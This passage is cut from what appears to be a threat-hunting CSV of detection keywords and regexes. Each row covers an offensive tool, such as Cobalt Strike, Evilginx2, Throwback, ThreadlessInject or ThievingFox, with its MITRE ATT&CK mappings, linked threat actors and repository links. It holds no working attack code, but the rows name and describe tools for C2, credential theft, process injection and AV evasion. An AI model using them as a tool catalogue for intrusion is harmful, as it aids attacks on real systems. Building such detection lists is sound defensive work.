Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","61253" "*The-Viper-One/PsMapExec*",".{0,1000}The\-Viper\-One\/PsMapExec.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","61254" "*thewover/donut*",".{0,1000}thewover\/donut.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","61255" "*thiagopeixoto/winsos-poc*",".{0,1000}thiagopeixoto\/winsos\-poc.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","61256" "*thief.py -*",".{0,1000}thief\.py\s\-.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","61257" "*ThievingFox.py *",".{0,1000}ThievingFox\.py\s.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","61258" "*third_party/SharpGen*",".{0,1000}third_party\/SharpGen.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","61259" "*third-party*winvnc*.dll*",".{0,1000}third\-party.{0,1000}winvnc.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 
- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61260" "*This backdoor requires Admin :(*",".{0,1000}This\sbackdoor\srequires\sAdmin\s\:\(.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","61261" "*This is similar to psexec -s \*",".{0,1000}This\sis\ssimilar\sto\spsexec\s\-s\s\\.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/malcomvetter/CSExec","1","0","#content","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","61262" "*This is the modified maintained version of Evilginx2. No one will be held responsible for your activities*",".{0,1000}This\sis\sthe\smodified\smaintained\sversion\sof\sEvilginx2\.\sNo\sone\swill\sbe\sheld\sresponsible\sfor\syour\sactivities.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#content","N/A","10","","N/A","","","","61263" "*This option will cause DDSpoof to create DNS records on the server*",".{0,1000}This\soption\swill\scause\sDDSpoof\sto\screate\sDNS\srecords\son\sthe\sserver.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","61264" "*this.is.not.a.phishing.site.evilsite.com*",".{0,1000}this\.is\.not\.a\.phishing\.site\.evilsite\.com.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","61265" 
"*thisisateststringdontcatchme*",".{0,1000}thisisateststringdontcatchme.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","61266" "*ThisIsNotRat-main*",".{0,1000}ThisIsNotRat\-main.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","N/A","9","10","64","17","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z","61267" "*thoth.py -*",".{0,1000}thoth\.py\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","61268" "*thoth-master.zip*",".{0,1000}thoth\-master\.zip.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","61269" "*Thread_Hiijack_Inject_Load.*",".{0,1000}Thread_Hiijack_Inject_Load\..{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","61270" "*thread-injector.exe *",".{0,1000}thread\-injector\.exe\s.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","61271" "*Threadless injection failed*",".{0,1000}Threadless\sinjection\sfailed.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","61272" "*ThreadlessInject* -p * -d *",".{0,1000}ThreadlessInject.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","61273" "*ThreadlessInject.exe*",".{0,1000}ThreadlessInject\.exe.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","61274" "*ThreadlessInject-master*",".{0,1000}ThreadlessInject\-master.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","61275" "*ThreadPoolInjection.lastbuildstate*",".{0,1000}ThreadPoolInjection\.lastbuildstate.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","61276" "*Thread-Pool-Injection-PoC-main*",".{0,1000}Thread\-Pool\-Injection\-PoC\-main.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","61277" "*threads all alertable*",".{0,1000}threads\sall\salertable.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61278" "*ThreadStackSpoofer*",".{0,1000}ThreadStackSpoofer.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","61279" "*ThreatCheck.csproj*",".{0,1000}ThreatCheck\.csproj.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","61280" "*ThreatCheck.csproj*",".{0,1000}ThreatCheck\.csproj.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","61281" "*ThreatCheck.exe*",".{0,1000}ThreatCheck\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","61282" "*ThreatCheck.exe*",".{0,1000}ThreatCheck\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","61283" "*ThreatCheck-master*",".{0,1000}ThreatCheck\-master.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","61284" "*threatexpress*malleable*",".{0,1000}threatexpress.{0,1000}malleable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - 
Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","61285" "*threatexpress/cs2modrewrite*",".{0,1000}threatexpress\/cs2modrewrite.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","61286" "*threatpatrols/sshamble*",".{0,1000}threatpatrols\/sshamble.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","61287" "*threeam7fj33rv5twe5ll7gcrp3kkyyt6ez5stssixnuwh4v3csxdwqd.onion*",".{0,1000}threeam7fj33rv5twe5ll7gcrp3kkyyt6ez5stssixnuwh4v3csxdwqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61288" "*Throwback\Base64_RC4.h*",".{0,1000}Throwback\\Base64_RC4\.h.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61289" "*throwback_x64.exe*",".{0,1000}throwback_x64\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61290" "*throwback_x86.exe*",".{0,1000}throwback_x86\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - 
TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61291" "*throwBackDev.exe*",".{0,1000}throwBackDev\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61292" "*ThrowbackDLL.cpp*",".{0,1000}ThrowbackDLL\.cpp.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61293" "*ThrowbackDLL.exe*",".{0,1000}ThrowbackDLL\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61294" "*ThrowbackDLL.vcxproj*",".{0,1000}ThrowbackDLL\.vcxproj.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61295" "*ThunderDNS*.php*",".{0,1000}ThunderDNS.{0,1000}\.php.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","61296" 
"*ThunderDNS*.ps1*",".{0,1000}ThunderDNS.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","61297" "*ThunderDNS*.py*",".{0,1000}ThunderDNS.{0,1000}\.py.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","61298" "*ThunderDNS.git*",".{0,1000}ThunderDNS\.git.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","61299" "*ThunderFox.exe*",".{0,1000}ThunderFox\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","61300" "*ThunderShell.git*",".{0,1000}ThunderShell\.git.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. 
